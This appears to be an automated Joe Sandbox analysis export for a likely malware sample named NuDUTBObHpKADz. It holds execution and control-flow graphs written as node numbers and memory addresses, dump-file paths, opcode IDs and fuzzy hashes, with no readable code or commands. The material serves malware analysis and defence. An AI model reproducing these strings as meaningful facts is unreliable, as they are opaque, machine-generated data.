                                                                                                                        execution_graph 20208 269e018 20209 269e024 20208->20209 20215 6552968 20209->20215 20211 269e61f 20216 655298a 20215->20216 20217 269e0c3 20216->20217 20228 655992c 20216->20228 20232 6559548 20216->20232 20220 655fc5e 20217->20220 20224 655fc68 20217->20224 20221 655fc8a 20220->20221 20222 6559548 LdrInitializeThunk 20221->20222 20223 655fd3a 20221->20223 20222->20223 20223->20211 20225 655fc8a 20224->20225 20226 6559548 LdrInitializeThunk 20225->20226 20227 655fd3a 20225->20227 20226->20227 20227->20211 20231 65597e3 20228->20231 20229 6559a69 LdrInitializeThunk 20230 6559a81 20229->20230 20230->20217 20231->20229 20234 6559579 20232->20234 20233 65596d9 20233->20217 20234->20233 20235 6559a69 LdrInitializeThunk 20234->20235 20235->20233

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 986 6559548-6559577 987 655957e-6559614 986->987 988 6559579 986->988 990 65596b3-65596b9 987->990 988->987 991 65596bf-65596d7 990->991 992 6559619-655962c 990->992 993 65596d9-65596e6 991->993 994 65596eb-65596fe 991->994 995 6559633-6559684 992->995 996 655962e 992->996 997 6559a81-6559b7e 993->997 998 6559705-6559721 994->998 999 6559700 994->999 1012 6559697-65596a9 995->1012 1013 6559686-6559694 995->1013 996->995 1004 6559b86-6559b90 997->1004 1005 6559b80-6559b85 997->1005 1001 6559723 998->1001 1002 6559728-655974c 998->1002 999->998 1001->1002 1008 6559753-6559785 1002->1008 1009 655974e 1002->1009 1005->1004 1018 6559787 1008->1018 1019 655978c-65597ce 1008->1019 1009->1008 1015 65596b0 1012->1015 1016 65596ab 1012->1016 1013->991 1015->990 1016->1015 1018->1019 1021 65597d5-65597de 1019->1021 1022 65597d0 1019->1022 1023 6559a06-6559a0c 1021->1023 1022->1021 1024 65597e3-6559808 1023->1024 1025 6559a12-6559a25 1023->1025 1026 655980f-6559846 1024->1026 1027 655980a 1024->1027 1028 6559a27 1025->1028 1029 6559a2c-6559a47 1025->1029 1037 655984d-655987f 1026->1037 1038 6559848 1026->1038 1027->1026 1028->1029 1030 6559a4e-6559a62 1029->1030 1031 6559a49 1029->1031 1035 6559a64 1030->1035 1036 6559a69-6559a7f LdrInitializeThunk 1030->1036 1031->1030 1035->1036 1036->997 1040 6559881-65598a6 1037->1040 1041 65598e3-65598f6 1037->1041 1038->1037 1042 65598ad-65598db 1040->1042 1043 65598a8 1040->1043 1044 65598fd-6559922 1041->1044 1045 65598f8 1041->1045 1042->1041 1043->1042 1048 6559924-6559925 1044->1048 1049 6559931-6559969 1044->1049 1045->1044 1048->1025 1050 6559970-65599d1 call 6559328 1049->1050 1051 655996b 1049->1051 1057 65599d3 1050->1057 1058 65599d8-65599fc 1050->1058 1051->1050 1057->1058 1061 6559a03 1058->1061 1062 65599fe 1058->1062 1061->1023 1062->1061
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000E.00000002.3843886496.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_14_2_6550000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6da2039b2490cfa4e6e4b83b6f8810e299346d905272331cc186219fb25774e5
                                                                                                                        • Instruction ID: 04fc5c9b5df7ddf07e7ccb808b8c80b3450010b79a40ed4263f705833622dcab
                                                                                                                        • Opcode Fuzzy Hash: 6da2039b2490cfa4e6e4b83b6f8810e299346d905272331cc186219fb25774e5
                                                                                                                        • Instruction Fuzzy Hash: 30F1E374E00258CFEB54DFA9D884B9DFBB2BF88304F1581AAD808AB355DB749985CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d17dbeaffc964988135819e7a963ce859d8f3f9ffd639f82247dacd7c3b12176
                                                                                                                        • Instruction ID: 991c54b57f137fcabca3f531e816a1a04e35e978ea69cc784ee02867163cb428
                                                                                                                        • Opcode Fuzzy Hash: d17dbeaffc964988135819e7a963ce859d8f3f9ffd639f82247dacd7c3b12176
                                                                                                                        • Instruction Fuzzy Hash: A7A24B74A002099FCF15CFA8C984AAEBBFABF88314F158569E405DB3A5DB35ED41CB50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 12e48b5dc82efad4e8f90ae2ae5a22c81fc2a2b4c5e6eae51e04df70a9c0b388
                                                                                                                        • Instruction ID: 76544239588ca4923ec9c3053e73cd12615b406c7417d8d69ad1b667de7e7a01
                                                                                                                        • Opcode Fuzzy Hash: 12e48b5dc82efad4e8f90ae2ae5a22c81fc2a2b4c5e6eae51e04df70a9c0b388
                                                                                                                        • Instruction Fuzzy Hash: A8124D70A002199FDB14DF69C894BAEBBFABF88700F108559E419AB395DF349D46CB90

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2546 2696fc8-2696ffe 2547 2697006-269700c 2546->2547 2691 2697000 call 2697118 2546->2691 2692 2697000 call 2696fc8 2546->2692 2693 2697000 call 26969a0 2546->2693 2548 269705c-2697060 2547->2548 2549 269700e-2697012 2547->2549 2552 2697062-2697071 2548->2552 2553 2697077-269708b 2548->2553 2550 2697021-2697028 2549->2550 2551 2697014-2697019 2549->2551 2554 26970fe-269713b 2550->2554 2555 269702e-2697035 2550->2555 2551->2550 2556 269709d-26970a7 2552->2556 2557 2697073-2697075 2552->2557 2558 2697093-269709a 2553->2558 2695 269708d call 269a0e8 2553->2695 2696 269708d call 2699de0 2553->2696 2697 269708d call 2699dd0 2553->2697 2567 269713d-2697143 2554->2567 2568 2697146-2697166 2554->2568 2555->2548 2559 2697037-269703b 2555->2559 2560 26970a9-26970af 2556->2560 2561 26970b1-26970b5 2556->2561 2557->2558 2565 269704a-2697051 2559->2565 2566 269703d-2697042 2559->2566 2563 26970bd-26970f7 2560->2563 2561->2563 2564 26970b7 2561->2564 2563->2554 2564->2563 2565->2554 2569 2697057-269705a 2565->2569 2566->2565 2567->2568 2574 2697168 2568->2574 2575 269716d-2697174 2568->2575 2569->2558 2577 26974fc-2697505 2574->2577 2578 2697176-2697181 2575->2578 2579 269750d-2697519 2578->2579 2580 2697187-269719a 2578->2580 2587 269751b-2697549 2579->2587 2588 2697584-269759a 2579->2588 2585 269719c-26971aa 2580->2585 2586 26971b0-26971cb 2580->2586 2585->2586 2599 2697484-269748b 2585->2599 2596 26971cd-26971d3 2586->2596 2597 26971ef-26971f2 2586->2597 2594 269754b-2697550 2587->2594 2595 2697552-2697556 2587->2595 2606 269759c-26975ab 2588->2606 2607 26975e4 2588->2607 2600 269755c-269755d 2594->2600 2595->2600 2601 26971dc-26971df 2596->2601 2602 26971d5 2596->2602 2604 26971f8-26971fb 2597->2604 2605 269734c-2697352 2597->2605 2599->2577 2603 269748d-269748f 2599->2603 2609 2697212-2697218 2601->2609 2611 26971e1-26971e4 2601->2611 2602->2601 2602->2605 2608 269743e-2697441 2602->2608 2602->2609 2612 269749e-26974a4 2603->2612 2613 2697491-2697496 2603->2613 2604->2605 2615 2697201-2697207 2604->2615 2605->2608 2614 2697358-269735d 2605->2614 2606->2607 2625 26975ad-26975b3 2606->2625 2610 26975e9-26975eb 2607->2610 2620 2697508 2608->2620 2621 2697447-269744d 2608->2621 2622 269721a-269721c 2609->2622 2623 269721e-2697220 2609->2623 2616 26971ea 2611->2616 2617 269727e-2697284 2611->2617 2612->2579 2618 26974a6-26974ab 2612->2618 2613->2612 2614->2608 2615->2605 2619 269720d 2615->2619 2616->2608 2617->2608 2628 269728a-2697290 2617->2628 2626 26974ad-26974b2 2618->2626 2627 26974f0-26974f3 2618->2627 2619->2608 2620->2579 2629 269744f-2697457 2621->2629 2630 2697472-2697476 2621->2630 2631 269722a-2697233 2622->2631 2623->2631 2634 26975b5 2625->2634 2635 26975b7-26975c3 2625->2635 2626->2620 2638 26974b4 2626->2638 2627->2620 2637 26974f5-26974fa 2627->2637 2639 2697292-2697294 2628->2639 2640 2697296-2697298 2628->2640 2629->2579 2641 269745d-269746c 2629->2641 2630->2599 2636 2697478-269747e 2630->2636 2632 2697235-2697240 2631->2632 2633 2697246-269726e 2631->2633 2632->2608 2632->2633 2666 2697362-2697398 2633->2666 2667 2697274-2697279 2633->2667 2642 26975c5-26975de 2634->2642 2635->2642 2636->2578 2636->2599 2637->2577 2637->2603 2643 26974bb-26974c0 2638->2643 2644 26972a2-26972b9 2639->2644 2640->2644 2641->2586 2641->2630 2642->2607 2663 26975e0-26975e2 2642->2663 2649 26974e2-26974e4 2643->2649 2650 26974c2-26974c4 2643->2650 2657 26972bb-26972d4 2644->2657 2658 26972e4-269730b 2644->2658 2649->2620 2652 26974e6-26974e9 2649->2652 2654 26974d3-26974d9 2650->2654 2655 26974c6-26974cb 2650->2655 2652->2627 2654->2579 2656 26974db-26974e0 2654->2656 2655->2654 2656->2649 2660 26974b6-26974b9 2656->2660 2657->2666 2670 26972da-26972df 2657->2670 2658->2620 2672 2697311-2697314 2658->2672 2660->2620 2660->2643 2663->2610 2673 269739a-269739e 2666->2673 2674 26973a5-26973ad 2666->2674 2667->2666 2670->2666 2672->2620 2675 269731a-2697343 2672->2675 2676 26973bd-26973c1 2673->2676 2677 26973a0-26973a3 2673->2677 2674->2620 2678 26973b3-26973b8 2674->2678 2675->2666 2690 2697345-269734a 2675->2690 2680 26973e0-26973e4 2676->2680 2681 26973c3-26973c9 2676->2681 2677->2674 2677->2676 2678->2608 2683 26973ee-269740d call 26976f1 2680->2683 2684 26973e6-26973ec 2680->2684 2681->2680 2682 26973cb-26973d3 2681->2682 2682->2620 2686 26973d9-26973de 2682->2686 2687 2697413-2697417 2683->2687 2684->2683 2684->2687 2686->2608 2687->2608 2688 2697419-2697435 2687->2688 2688->2608 2690->2666 2691->2547 2692->2547 2693->2547 2695->2558 2696->2558 2697->2558
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5b2f317645dc012c4bc7ac627545cf8a2ba8e56422392c95a26d486463a986af
                                                                                                                        • Instruction ID: 33e2b991b5afa934348231b92690663397e90fa20591c5c86844ee13515cb786
                                                                                                                        • Opcode Fuzzy Hash: 5b2f317645dc012c4bc7ac627545cf8a2ba8e56422392c95a26d486463a986af
                                                                                                                        • Instruction Fuzzy Hash: F9124AB0A10209DFDF56CF69C984AADFBBABF49704F158069E805AB365DB30ED41CB50

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 3068 26929ec-26929f6 3070 26929f8-2692a3b 3068->3070 3071 2692981-2692999 3068->3071 3077 2692a5d-2692aac 3070->3077 3078 2692a3d-2692a5c 3070->3078 3074 26929a0-26929c8 3071->3074 3082 2692aae-2692ab5 3077->3082 3083 2692ac7-2692acf 3077->3083 3084 2692abe-2692ac5 3082->3084 3085 2692ab7-2692abc 3082->3085 3086 2692ad2-2692ae6 3083->3086 3084->3086 3085->3086 3089 2692ae8-2692aef 3086->3089 3090 2692afc-2692b04 3086->3090 3091 2692af1-2692af3 3089->3091 3092 2692af5-2692afa 3089->3092 3093 2692b06-2692b0a 3090->3093 3091->3093 3092->3093 3095 2692b6a-2692b6d 3093->3095 3096 2692b0c-2692b21 3093->3096 3097 2692b6f-2692b84 3095->3097 3098 2692bb5-2692bbb 3095->3098 3096->3095 3102 2692b23-2692b26 3096->3102 3097->3098 3110 2692b86-2692b8a 3097->3110 3099 2692bc1-2692bc3 3098->3099 3100 26936b6 3098->3100 3099->3100 3103 2692bc9-2692bce 3099->3103 3107 26936bb-26936f0 3100->3107 3105 2692b28-2692b2a 3102->3105 3106 2692b45-2692b63 call 26902c8 3102->3106 3108 2693664-2693668 3103->3108 3109 2692bd4 3103->3109 3105->3106 3113 2692b2c-2692b2f 3105->3113 3106->3095 3128 269371f-2693874 3107->3128 3129 26936f2-269371a 3107->3129 3115 269366a-269366d 3108->3115 3116 269366f-26936b5 3108->3116 3109->3108 3111 2692b8c-2692b90 3110->3111 3112 2692b92-2692bb0 call 26902c8 3110->3112 3111->3098 3111->3112 3112->3098 3113->3095 3118 2692b31-2692b43 3113->3118 3115->3107 3115->3116 3118->3095 3118->3106 3130 26938a6-26938bc 3128->3130 3131 2693876-2693881 3128->3131 3129->3128 3132 26938ee-26938f4 3130->3132 3133 26938be-26938c4 3130->3133 3131->3130 3136 26938f6-269390c 3132->3136 3139 2693928-269393d 3132->3139 3133->3136 3137 26938c6-26938d1 3133->3137 3140 269393e-2693969 3136->3140 3141 269390e-2693919 3136->3141 3137->3132 3139->3140 3141->3139
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7c5b8ccd35b464b774530d03bd335b18c9d9c87b73221d3a85c6ae53c28d0079
                                                                                                                        • Instruction ID: e964a6eae5853f371168873790bc96bae93311b302eed76756522c1db6fff83a
                                                                                                                        • Opcode Fuzzy Hash: 7c5b8ccd35b464b774530d03bd335b18c9d9c87b73221d3a85c6ae53c28d0079
                                                                                                                        • Instruction Fuzzy Hash: 89C18031A043569BCF16CF78CAA179AFBFDEB89204F1445DAC804AB391CF319A52CB41

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 3202 2693e09-2693e25 3203 2693e2e-2693e3e 3202->3203 3204 2693e27-2693e29 3202->3204 3206 2693e40 3203->3206 3207 2693e45-2693e55 3203->3207 3205 26940cc-26940d3 3204->3205 3206->3205 3209 2693e5b-2693e69 3207->3209 3210 26940b3-26940c1 3207->3210 3213 2693e6f 3209->3213 3214 26940d4-2694152 3209->3214 3210->3214 3215 26940c3-26940c7 call 26902c8 3210->3215 3213->3214 3216 2693e8d-2693eae 3213->3216 3217 2693f4c-2693f6d 3213->3217 3218 2693fcc-2694009 3213->3218 3219 269400e-2694034 3213->3219 3220 2693f00-2693f21 3213->3220 3221 2694084-26940a5 call 26928f0 3213->3221 3222 2694067-2694082 call 26902d8 3213->3222 3223 26940a7-26940b1 3213->3223 3224 2693f26-2693f47 3213->3224 3225 2694039-2694065 3213->3225 3226 2693eda-2693efb 3213->3226 3227 2693f9f-2693fc7 3213->3227 3228 2693eb3-2693ed5 3213->3228 3229 2693f72-2693f9a 3213->3229 3230 2693e76-2693e88 3213->3230 3215->3205 3216->3205 3217->3205 3218->3205 3219->3205 3220->3205 3221->3205 3222->3205 3223->3205 3224->3205 3225->3205 3226->3205 3227->3205 3228->3205 3229->3205 3230->3205
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e03eecddcf3a41ae3c43b2d294e1eed3dd3d4ef8f2ac54a14fdfb08b512dac61
                                                                                                                        • Instruction ID: e6cdfc0f6bc457a6437e62947c94c929e2bcda048546a9c0ae4dfe8f2d1453f8
                                                                                                                        • Opcode Fuzzy Hash: e03eecddcf3a41ae3c43b2d294e1eed3dd3d4ef8f2ac54a14fdfb08b512dac61
                                                                                                                        • Instruction Fuzzy Hash: 3191A134B05259DFDF08EBB5886427E7BA7BFC9701B08896ED446E7384CE3598038B95
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8421080a3ba22854fe69f0b5dd79721575f0228f5b3807129f8f003cd994b4a1
                                                                                                                        • Instruction ID: f4112224c5aa8867df121da8782057adb9003459db987b5fefc400123fea4058
                                                                                                                        • Opcode Fuzzy Hash: 8421080a3ba22854fe69f0b5dd79721575f0228f5b3807129f8f003cd994b4a1
                                                                                                                        • Instruction Fuzzy Hash: 1A817F74E00218CFEB18DFAAD984B9DBBF2BF89301F148069E419AB365DB349945CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bf597a7c44cc1c83826bb1376244b6001de93858414f7512d8f09d19a28c1df9
                                                                                                                        • Instruction ID: bb0ab4b35736e72bd794d4f5fa9ec7b5af31fef545616530006a15ad7230830c
                                                                                                                        • Opcode Fuzzy Hash: bf597a7c44cc1c83826bb1376244b6001de93858414f7512d8f09d19a28c1df9
                                                                                                                        • Instruction Fuzzy Hash: 12818274E00218CFEB54DFAAD984A9DBBF2BF89300F14C06AE419AB365DB349945CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e183db2a3aad05a0f72ecfa8d8893655161f9f29466839a47fbc1e28ba888e83
                                                                                                                        • Instruction ID: ce62ee9040326849e7eae19706e2a478886fc4fec0959ed84efd28f43711d8ae
                                                                                                                        • Opcode Fuzzy Hash: e183db2a3aad05a0f72ecfa8d8893655161f9f29466839a47fbc1e28ba888e83
                                                                                                                        • Instruction Fuzzy Hash: 38816F74E00218CFEB18DFAAD984B9DBBF2BF89300F14806AD419AB365DB349945CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 55d89cc7cbad67dc4a029f37b5e5377802b592f2bbbcac96947e2b1bb5b88283
                                                                                                                        • Instruction ID: 16e27c7aa56874b02f3bf7d5e59443b5fa7e82d33e9d1fd1c5e70752207263e4
                                                                                                                        • Opcode Fuzzy Hash: 55d89cc7cbad67dc4a029f37b5e5377802b592f2bbbcac96947e2b1bb5b88283
                                                                                                                        • Instruction Fuzzy Hash: 06818174E00618CFEF18DFAAD944A9DBBF2BF89300F24906AD419AB365DB349945CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6ce9a94870104e0469a3610a38334d84d496006d62af3784073733f1acee1aeb
                                                                                                                        • Instruction ID: 18f764d034c1eace8ad9d352aff061b550fd9065d2c4d6b6243ff75af2a3f0a3
                                                                                                                        • Opcode Fuzzy Hash: 6ce9a94870104e0469a3610a38334d84d496006d62af3784073733f1acee1aeb
                                                                                                                        • Instruction Fuzzy Hash: 8B818074E00218CFEB18DFAAD994A9DBBF2BF89310F14806AD419AB365DB349945CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bd59f450393edc6ffc990c07618d694ee87b78afddf9f31c8bed3504ee65866b
                                                                                                                        • Instruction ID: 6030f74f8bf5566b6c4fea80a07838dbaee4868cd231829f9a5442dcf2f6e9ad
                                                                                                                        • Opcode Fuzzy Hash: bd59f450393edc6ffc990c07618d694ee87b78afddf9f31c8bed3504ee65866b
                                                                                                                        • Instruction Fuzzy Hash: A8818F74E00218CFEB18DFAAD984B9DBBF2BF89310F148069E419AB365DB349945CF10
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4c380ab91e565dcb35f1718c962e3f753b70c1b616d01c88494578f41c905ff7
                                                                                                                        • Instruction ID: 9653d2fc84cae87213d17d9bce107726228ec02ed84c2b9abc3f0f3062a3832e
                                                                                                                        • Opcode Fuzzy Hash: 4c380ab91e565dcb35f1718c962e3f753b70c1b616d01c88494578f41c905ff7
                                                                                                                        • Instruction Fuzzy Hash: 42817F74E00218CFEB14DFAAD984A9DBBF6BF88300F14C06AE419AB365DB345945CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b4ea311a192f5756502c3cdfed102f27ed89abd1948d2f3cc144ea946d91b78d
                                                                                                                        • Instruction ID: 34c8c84d9fc8676cb6a15afefba409268ef9ec8b601913bc0c31f70b9c8646c8
                                                                                                                        • Opcode Fuzzy Hash: b4ea311a192f5756502c3cdfed102f27ed89abd1948d2f3cc144ea946d91b78d
                                                                                                                        • Instruction Fuzzy Hash: 30518674E01208DFEB18DFA6D594A9DBBF2BF89300F24C12AE819AB364DB315945CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ef37bc65a5d71c11b9682fbcd8b48d994de0d87dd97e7ae233c14d944a2ef93a
                                                                                                                        • Instruction ID: 26efa97fbf4158d60b90e39bcbd2f1a1f0e49ef024f6e29e4ad33a7cc9ee3bfe
                                                                                                                        • Opcode Fuzzy Hash: ef37bc65a5d71c11b9682fbcd8b48d994de0d87dd97e7ae233c14d944a2ef93a
                                                                                                                        • Instruction Fuzzy Hash: 37519074E006088FEB58DFAAD984A9DBBF2BF89300F14C069D819AB365DB349945CF50

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1063 655992c 1064 65599eb-65599fc 1063->1064 1065 6559a03-6559a0c 1064->1065 1066 65599fe 1064->1066 1068 65597e3-6559808 1065->1068 1069 6559a12-6559a25 1065->1069 1066->1065 1070 655980f-6559846 1068->1070 1071 655980a 1068->1071 1072 6559a27 1069->1072 1073 6559a2c-6559a47 1069->1073 1082 655984d-655987f 1070->1082 1083 6559848 1070->1083 1071->1070 1072->1073 1074 6559a4e-6559a62 1073->1074 1075 6559a49 1073->1075 1079 6559a64 1074->1079 1080 6559a69-6559a7f LdrInitializeThunk 1074->1080 1075->1074 1079->1080 1081 6559a81-6559b7e 1080->1081 1086 6559b86-6559b90 1081->1086 1087 6559b80-6559b85 1081->1087 1088 6559881-65598a6 1082->1088 1089 65598e3-65598f6 1082->1089 1083->1082 1087->1086 1090 65598ad-65598db 1088->1090 1091 65598a8 1088->1091 1093 65598fd-6559922 1089->1093 1094 65598f8 1089->1094 1090->1089 1091->1090 1097 6559924-6559925 1093->1097 1098 6559931-6559969 1093->1098 1094->1093 1097->1069 1099 6559970-65599d1 call 6559328 1098->1099 1100 655996b 1098->1100 1106 65599d3 1099->1106 1107 65599d8-65599ea 1099->1107 1100->1099 1106->1107 1107->1064
                                                                                                                        APIs
                                                                                                                        • LdrInitializeThunk.NTDLL(00000000), ref: 06559A6E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000E.00000002.3843886496.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_14_2_6550000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: b030ac18fb4374bc2c20b219f2036ac312a3d2d5c6cb67685d33d1f78fbfcc52
                                                                                                                        • Instruction ID: 8a5e5dfcc08d66ffe519ea4220687a73e4f255e1017b56985eba8169a0559287
                                                                                                                        • Opcode Fuzzy Hash: b030ac18fb4374bc2c20b219f2036ac312a3d2d5c6cb67685d33d1f78fbfcc52
                                                                                                                        • Instruction Fuzzy Hash: 54116A74E04249CFEB48DFA8E898AEDF7B5FB88314F15816AEC04A7245D734AD41CB60

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1735 269e018-269e022 1736 269e029-269e0a7 call 269e8fb call 269f72f 1735->1736 1737 269e024 1735->1737 2061 269e0a8 call 6550c01 1736->2061 2062 269e0a8 call 6550b30 1736->2062 2063 269e0a8 call 6550b20 1736->2063 1737->1736 1756 269e0ae 2064 269e0af call 65517a0 1756->2064 2065 269e0af call 655178f 1756->2065 1757 269e0b5 2066 269e0b6 call 6551e70 1757->2066 2067 269e0b6 call 6551e80 1757->2067 1758 269e0bc-269e618 call 6552968 2057 269e619 call 655fc5e 1758->2057 2058 269e619 call 655fc68 1758->2058 1955 269e61f-269e8db 2056 269e8e2-269e8e5 1955->2056 2057->1955 2058->1955 2061->1756 2062->1756 2063->1756 2064->1757 2065->1757 2066->1758 2067->1758
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ea9a7cc249480cc06fb1be9990a7bad76c19024c86444e89cb856b7fae3999f9
                                                                                                                        • Instruction ID: 27723e115d9312735a54de77e0359d207f3abc5999c8bb1c3b79a1be7c5d9e55
                                                                                                                        • Opcode Fuzzy Hash: ea9a7cc249480cc06fb1be9990a7bad76c19024c86444e89cb856b7fae3999f9
